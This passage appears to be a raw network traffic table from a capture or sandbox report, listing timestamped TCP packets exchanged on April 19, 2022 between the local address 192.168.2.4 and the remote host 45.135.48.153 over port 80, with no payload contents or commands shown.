Apr 19, 2022 16:44:42.489860058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.489917040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490113020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490211010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490266085 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.490339041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490387917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.490454912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490473032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490629911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490684986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.490710020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490757942 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.490822077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.490976095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491058111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491111994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.491172075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491219997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.491292000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491385937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491529942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491588116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.491619110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491674900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.491797924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.491895914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492003918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492053986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.492098093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492146969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.492211103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492309093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492454052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492506981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.492573023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492625952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.492660999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492780924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492907047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.492974997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.493006945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493060112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.493103981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493227959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493372917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493422031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493438005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.493463039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.493556976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493664026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493729115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.493804932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493912935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.493993998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494060993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.494110107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494162083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.494265079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494366884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494420052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.494474888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494604111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494680882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.494734049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494813919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494915009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.494976044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.495006084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495054960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.495135069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495255947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495371103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495435953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.495472908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495644093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.495646954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495779991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495846987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.495933056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.495978117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.496052980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.496073008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.496169090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.496313095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.496371031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.496378899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.496438980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.548919916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.590935946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591007948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591039896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591080904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591142893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591208935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591228962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.591290951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.591299057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.591345072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591454983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591553926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591629028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.591655016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591717958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.591897011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591938972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.591980934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.592039108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.592106104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.592163086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.592609882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.592650890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.592777014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.592839003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.592906952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.592967987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.593034983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593106031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593271017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593338013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.593389988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593430042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593445063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.593614101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593724012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593791962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.593842983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.593902111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.593911886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594042063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594187021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594244957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594254017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.594300985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.594336033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594528913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594614029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594675064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.594717979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594780922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.594827890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.594954014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595083952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595143080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595146894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.595194101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.595334053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595376968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595483065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595546007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.595642090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595700979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.595748901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595818996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.595962048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596020937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.596071005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596127033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.596190929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596263885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596404076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596478939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.596523046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596586943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.596654892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596746922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596890926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.596960068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.597006083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597065926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.597098112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597213984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597328901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597398996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.597444057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597522020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.597563028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597644091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597778082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597845078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.597912073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597950935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.597968102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.598128080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598192930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.598229885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598731995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598771095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598798990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.598810911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598850965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598889112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598931074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.598931074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.598972082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.598999977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599081993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.599108934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599239111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599298000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.599361897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599448919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599549055 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.599606037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599673986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599733114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.599823952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599922895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.599998951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.600034952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600152969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600321054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600359917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600385904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.600434065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.600485086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600600958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600667000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.600716114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600785017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.600841999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.600934982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601046085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601141930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601202965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.601265907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601320982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.601433039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601495981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601560116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.601588011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601717949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601783991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.601877928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.601989031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602147102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602214098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602216959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.602268934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.602300882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602387905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602561951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602629900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.602711916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602756023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.602777004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.602875948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603013039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603055000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603077888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.603096962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.603197098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603308916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603451014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603552103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.603563070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603615046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.603691101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603815079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603878975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.603933096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.604027033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604083061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.604135036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604208946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604326010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604381084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.604443073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604496956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.604563951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604688883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604800940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604862928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.604932070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604974031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.604988098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.605149031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.605236053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.605290890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.605405092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.605444908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.605462074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.605587006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.605730057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.605782986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.605822086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.605874062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.605937958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606033087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606190920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606252909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.606266022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606318951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.606414080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606508970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606643915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606684923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606707096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.606735945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.606813908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.606960058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607076883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607135057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.607141972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607188940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.607306957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607409000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607502937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607558966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.607603073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607659101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.607717037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607834101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.607943058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608005047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.608042002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608093023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.608186007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608290911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608489037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608514071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608552933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.608592987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.608642101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608743906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608808041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.608906031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.608958006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609082937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609138012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.609227896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609278917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.609337091 CEST	80	49758	45.135.48.153	192.168.2.4
